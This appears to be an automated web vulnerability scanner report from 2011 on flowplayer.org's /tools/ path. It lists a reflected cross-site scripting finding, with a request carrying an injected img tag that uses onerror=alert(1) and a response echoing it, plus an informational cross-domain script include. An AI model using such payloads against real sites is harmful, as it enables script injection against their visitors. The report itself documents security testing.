1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://flowplayer.org |
Path: | /tools/ |
GET /tools2b527"><img%20src%3da Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 /tools2b527">< Server: nginx/0.7.65 Date: Wed, 09 Feb 2011 22:12:19 GMT Content-Type: text/html;charset=ISO Connection: close Vary: Accept-Encoding Content-Length: 5920 <!DOCTYPE html> <!-- Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="tools2b527"><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://flowplayer.org |
Path: | /tools/ |
GET /tools/ HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Wed, 09 Feb 2011 22:12:19 GMT Content-Type: text/html;charset=ISO Connection: close Vary: Accept-Encoding Content-Length: 13115 <!DOCTYPE html> <!-- Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <link rel="stylesheet" type="text/css" href="/css/global-0.52 <script src="http://cdn ...[SNIP]... |